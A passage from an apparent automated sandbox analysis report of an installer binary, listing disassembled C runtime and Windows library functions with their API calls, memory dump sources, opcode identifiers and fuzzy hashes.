                            • Instruction Fuzzy Hash: E011B0B0900B648EC720DF5AC55419AFBE8AFA5708B10CA1FC4A687B50D7F8A548CB99
                            Function 6CC4281A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CC428A4,00000000,?,6CC42925,6CC3D339,00000003,00000000), ref: 6CC4282F
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC42842
                            • FreeLibrary.KERNEL32(00000000,?,?,6CC428A4,00000000,?,6CC42925,6CC3D339,00000003,00000000), ref: 6CC42865
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: d2498f78d31b3e5da91d082c1869ae733fa5955f623fe7bd0739c62cebc5c463
                            • Instruction ID: 5787e15b81778cfc0191f7271e96de2a1cf7179ae49dde0fff4d4fa778e2209b
                            • Opcode Fuzzy Hash: d2498f78d31b3e5da91d082c1869ae733fa5955f623fe7bd0739c62cebc5c463
                            • Instruction Fuzzy Hash: 28F08231A11118FBDF119B52CE1DF9D7BB8EB4135DF118464A500F2950DF348A41EB90
                            Function 6CC3AA17 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog3.LIBCMT ref: 6CC3AA1E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CC3AA29
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CC3AA97
                              • Part of subcall function 6CC3A920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CC3A938
                            • std::locale::_Setgloballocale.LIBCPMT ref: 6CC3AA44
                            • _Yarn.LIBCPMT ref: 6CC3AA5A
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: d9a41b9448c3eeeaefcd03b1cb891c924a4182b4ceb49e60aae47326ffb847a1
                            • Instruction ID: 18765a2f2d11aa2a79dc41bb460282fb7c3f9dd450834e7e770ba6d6b94c15e8
                            • Opcode Fuzzy Hash: d9a41b9448c3eeeaefcd03b1cb891c924a4182b4ceb49e60aae47326ffb847a1
                            • Instruction Fuzzy Hash: B401BC75B006219FEF06EBA0DA54ABC3BB5FFC6244B151048D90957B80EF38AA56CF91
                            Function 6CCB9E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 7b6d1953a432ff85bbe01f1c2a0d04f487ead367bb55d2e5e96ba4d6491816ba
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: C5123B74E05249DFCB04CFE8C590ADEBBB1BF49308F148469E486ABB51EB35E945CB60
                            Function 6CC85B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: fb5aefaa8199234e641520484358bcc1b29c9c3eb647329c4a10f51a89f81f2a
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 1EB14DB1E022099FDB14CF99C9809AFBBB1FF48318B60856ED416A7B50E774AA45CF50
                            Function 6CB02020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 6CC3AA17: __EH_prolog3.LIBCMT ref: 6CC3AA1E
                              • Part of subcall function 6CC3AA17: std::_Lockit::_Lockit.LIBCPMT ref: 6CC3AA29
                              • Part of subcall function 6CC3AA17: std::locale::_Setgloballocale.LIBCPMT ref: 6CC3AA44
                              • Part of subcall function 6CC3AA17: _Yarn.LIBCPMT ref: 6CC3AA5A
                              • Part of subcall function 6CC3AA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6CC3AA97
                              • Part of subcall function 6CB02F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB02F95
                              • Part of subcall function 6CB02F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB02FAF
                              • Part of subcall function 6CB02F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB02FD0
                              • Part of subcall function 6CB02F60: __Getctype.LIBCPMT ref: 6CB03084
                              • Part of subcall function 6CB02F60: std::_Facet_Register.LIBCPMT ref: 6CB0309C
                              • Part of subcall function 6CB02F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB030B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6CB0211B
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3332196525-1866435925
                            • Opcode ID: 72c57a3a3c249f763921173aadb5a3dd5eddf1afe59b2562c06d993769fbebad
                            • Instruction ID: b078dfd936b27c673cec29af2c813aa2f14fb886bd3fa7eb2e0e7d43acda5dea
                            • Opcode Fuzzy Hash: 72c57a3a3c249f763921173aadb5a3dd5eddf1afe59b2562c06d993769fbebad
                            • Instruction Fuzzy Hash: AB41B2B0A003499FDB00CF64D8897AEBBB0FF48314F144268E519AB791E7759989CF91
                            Function 6CC891D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $CK$CK
                            • API String ID: 3519838083-2957773085
                            • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                            • Instruction ID: bbe751b5e5e0c91eee5d12046919b8cba7e2cbcdec502ba42a16e710a7e35e16
                            • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                            • Instruction Fuzzy Hash: 4821A171E02615CBCB04DFE9C4801EFFBB2FF95318F14462AC412A3B91E7745A06CAA1
                            Function 6CCA0584 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$LrJ$x
                            • API String ID: 3519838083-658305261
                            • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                            • Instruction ID: c1c57b1b43158a4e8fb4a6cfb7c45a6354e4f80274aa1265664147a66b4146a0
                            • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                            • Instruction Fuzzy Hash: D0218132D01119DBCF04DBD8CAD4AEDB7B5EF98348F20005AD41177A40EB759E09CBA5
                            Function 6CC97EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC97ECC
                              • Part of subcall function 6CC8258A: __EH_prolog.LIBCMT ref: 6CC8258F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            • API String ID: 3519838083-2437443688
                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction ID: a6851eba17a9dfcf479f0303ef46d15221c081a3bed0e32c46a3e6744f1d11c9
                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction Fuzzy Hash: DA21C6B0801B40CFC760CF6AC14428ABBF4FF29708B10895EC0AA97F11E7B8A609CF55
                            Function 6CC4E480 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CC4E7C0,6CB01DEA,00008000,6CC4E7C0,?,?,?,6CC4E36F,6CC4E7C0,?,00000000,6CB01DEA), ref: 6CC4E4B9
                            • GetLastError.KERNEL32(?,?,?,6CC4E36F,6CC4E7C0,?,00000000,6CB01DEA,?,6CC57D8E,6CC4E7C0,000000FF,000000FF,00000002,00008000,6CC4E7C0), ref: 6CC4E4C3
                            • __dosmaperr.LIBCMT ref: 6CC4E4CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            • API String ID: 2336955059-4022487301
                            • Opcode ID: e7583522c6b9a1174f2957c684c7bd019576d9283619ae17b977aec67f370ed9
                            • Instruction ID: 2448a2b1620e159854bc7cee72b407b8235e5114031c467d136f7e212e5b6f2a
                            • Opcode Fuzzy Hash: e7583522c6b9a1174f2957c684c7bd019576d9283619ae17b977aec67f370ed9
                            • Instruction Fuzzy Hash: EF01D832710515ABDB05CF9ACC45C9D7B3DEBC6334B29C24DE921ABA80FA71D9518790
                            Function 6CC8ED0E Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: <J$DJ$HJ$TJ$]
                            • API String ID: 0-686860805
                            • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                            • Instruction ID: db3991890b8eb7420937ae2b68d147dce35d1fed8ff22d95fcda7afef35667b3
                            • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                            • Instruction Fuzzy Hash: E4418675C06289ABCF14DBA1D4908EFBB70AF1130CB24856ED02167E50FB35EA4DCBA1
                            Function 6CC89331 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                            • Instruction ID: 24249c9591bd23ec9d9d171ddc395da68580f6000aaa88372e4a8d05e4e4d8e0
                            • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                            • Instruction Fuzzy Hash: D2118176641308BFEB218FA5CC40EAB7FB9EBC9748F008419B245566A0D6B1AC049730
                            Function 6CC480A2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000008,?,00000000,6CC4BB43), ref: 6CC480A7
                            • _free.LIBCMT ref: 6CC48104
                            • _free.LIBCMT ref: 6CC4813A
                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CC48145
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 443318c4197a09c7a2b722d4c5b77fb22058bac6a15a3e506f09ea207ab9be92
                            • Instruction ID: eba8e9abbdaa193434ec353e6ac18b6849463b379017e123ff99f38fab75de2b
                            • Opcode Fuzzy Hash: 443318c4197a09c7a2b722d4c5b77fb22058bac6a15a3e506f09ea207ab9be92
                            • Instruction Fuzzy Hash: 0B11EC31704601AFEA211A758C84D6B2279BBC37BD725C637F628D6AC0FF218C066350
                            Function 6CC595AA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6CC57DDC,00000000,00000000,?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0), ref: 6CC595C1
                            • GetLastError.KERNEL32(?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?,6CC4E7C0,?,6CC4F40C,6CC591A6), ref: 6CC595CD
                              • Part of subcall function 6CC5961E: CloseHandle.KERNEL32(FFFFFFFE,6CC595DD,?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?,6CC4E7C0), ref: 6CC5962E
                            • ___initconout.LIBCMT ref: 6CC595DD
                              • Part of subcall function 6CC595FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CC5959B,6CC5822E,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?), ref: 6CC59612
                            • WriteConsoleW.KERNEL32(00000000,?,6CC57DDC,00000000,?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?), ref: 6CC595F2
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: 448f88e10babc1b4070a73b6f1d9894825deb07ec197f34e43bad4d9783685f8
                            • Instruction ID: 00072caaabfb86d3e1843a814c46b8b3d0f14349f51581701f6606159fb37b1e
                            • Opcode Fuzzy Hash: 448f88e10babc1b4070a73b6f1d9894825deb07ec197f34e43bad4d9783685f8
                            • Instruction Fuzzy Hash: 76F03076600118BBCF221F92CC4499D3F76FF0A7B5B444590FA0A95664EB32C871EB95
                            Function 6CC71072 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 398COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC71077
                              • Part of subcall function 6CC70FF5: __EH_prolog.LIBCMT ref: 6CC70FFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :$\
                            • API String ID: 3519838083-1166558509
                            • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                            • Instruction ID: 642d756a142dc8544bc5b304e9fa9dcf6cdd82dad594c8552914f06b9b937ba0
                            • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                            • Instruction Fuzzy Hash: ECE1D2709002459ACF24DFA9C5A07EDB7B1FF1531CF108119D85AABE90FB75E649CB21
                            Function 6CCBD354 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 234COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog__aullrem
                            • String ID: d%K
                            • API String ID: 3415659256-3110269457
                            • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                            • Instruction ID: 749cf4bfb50cd8b8b7ed30cf96cb0ad6fec851e96fe02be876209d5e703a13dd
                            • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                            • Instruction Fuzzy Hash: 1981C2B1A002199FDF00CF98C590BDEB7F5AF4535DF248069D818BBA49E771E909CBA1
                            Function 6CC46814 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            • API String ID: 2427045233-4022487301
                            • Opcode ID: 971eda649d2dcf1b1725d2ea54369247f72aebed579a392e234311111a486c40
                            • Instruction ID: 843ae94f6f6225754e82574b118dd1e0130033b2c430be7e18f23034a57f3793
                            • Opcode Fuzzy Hash: 971eda649d2dcf1b1725d2ea54369247f72aebed579a392e234311111a486c40
                            • Instruction Fuzzy Hash: 5C71B571D45E169BEB108F95C880AEE7BB5FF45318F24C229E820E7A48FB75C985C760
                            Function 6CC96C20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$hfJ
                            • API String ID: 3519838083-1391159562
                            • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                            • Instruction ID: e0fbecff17856498986e095169bb148229050e46211f3f50e88e06500bcd8375
                            • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                            • Instruction Fuzzy Hash: 8E914771910608DFCB10DFA9C8909DEFBB4FF19308F54456EE056E7A90E770AA48CB60
                            Function 6CC8BC58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC8BC5D
                              • Part of subcall function 6CC8A61A: __EH_prolog.LIBCMT ref: 6CC8A61F
                              • Part of subcall function 6CC8AA2E: __EH_prolog.LIBCMT ref: 6CC8AA33
                              • Part of subcall function 6CC8BEA5: __EH_prolog.LIBCMT ref: 6CC8BEAA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            • API String ID: 3519838083-1089469559
